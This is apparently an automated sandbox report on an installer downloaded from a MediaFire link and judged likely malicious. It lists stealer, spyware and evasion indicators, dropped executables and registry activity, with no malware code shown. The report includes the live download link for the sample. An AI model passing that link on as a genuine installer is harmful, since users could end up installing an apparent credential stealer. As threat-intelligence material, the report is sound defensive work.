Malware Analysis Report

2024-11-30 06:11

Sample ID 240612-rzmekssdjr
Target https://www.mediafire.com/file/zkifq4bnbg77ur2/IslandHoppersInstallerv1.3.0.exe/file
Tags
discovery execution spyware stealer
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

Threat Level: Likely malicious

The file https://www.mediafire.com/file/zkifq4bnbg77ur2/IslandHoppersInstallerv1.3.0.exe/file was found to be: Likely malicious.

Malicious Activity Summary

discovery execution spyware stealer

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Loads dropped DLL

Executes dropped EXE

Reads user/profile data of web browsers

Checks installed software on the system

An obfuscated cmd.exe command-line is typically used to evade detection.

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

NTFS ADS

Enumerates processes with tasklist

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Checks processor information in registry

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Opens file in notepad (likely ransom note)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Enumerates system info in registry

Kills process with taskkill

Modifies Internet Explorer settings

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-12 14:37

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-12 14:37

Reported

2024-06-12 14:43

Platform

win11-20240611-en

Max time kernel

333s

Max time network

333s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/zkifq4bnbg77ur2/IslandHoppersInstallerv1.3.0.exe/file

Signatures

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1xev6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\txo0j6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hbbe7g.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5idqc5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cygqc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ch5g4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\zglt0c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5nwlzd.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\Downloads\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\Downloads\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\Downloads\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\Downloads\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\Downloads\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1xev6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\txo0j6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\txo0j6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hbbe7g.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hbbe7g.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5idqc5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cygqc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ch5g4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ch5g4.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\zglt0c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5nwlzd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5nwlzd.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\taskmgr.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\GPU\SubSysId = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateHighDateTime = "31112427" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\HomepagesUpgradeVersion = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPMigrationVer = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "9" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\BrowserEmulation C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\GPU\SoftwareFallback = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\GPU\DeviceId = "140" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListDomainAttributeSet = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "13" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh = "268435456" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\GPU\VendorId = "4318" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\GPU\Revision = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "268435456" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateLowDateTime = "3166136309" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "395196024" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow = "395196024" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "8" C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings C:\Windows\system32\taskmgr.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 8256.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\IslandHoppersInstallerv1.3.0.exe:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Users\Admin\AppData\Local\islandhoppersinstallerv1.3.0-updater\installer.exe\:SmartScreen:$DATA C:\Users\Admin\Downloads\IslandHoppersInstallerv1.3.0.exe N/A
File created C:\Users\Admin\AppData\Local\islandhoppersinstallerv1.3.0-updater\installer.exe\:Zone.Identifier:$DATA C:\Users\Admin\Downloads\IslandHoppersInstallerv1.3.0.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Downloads\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\Downloads\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
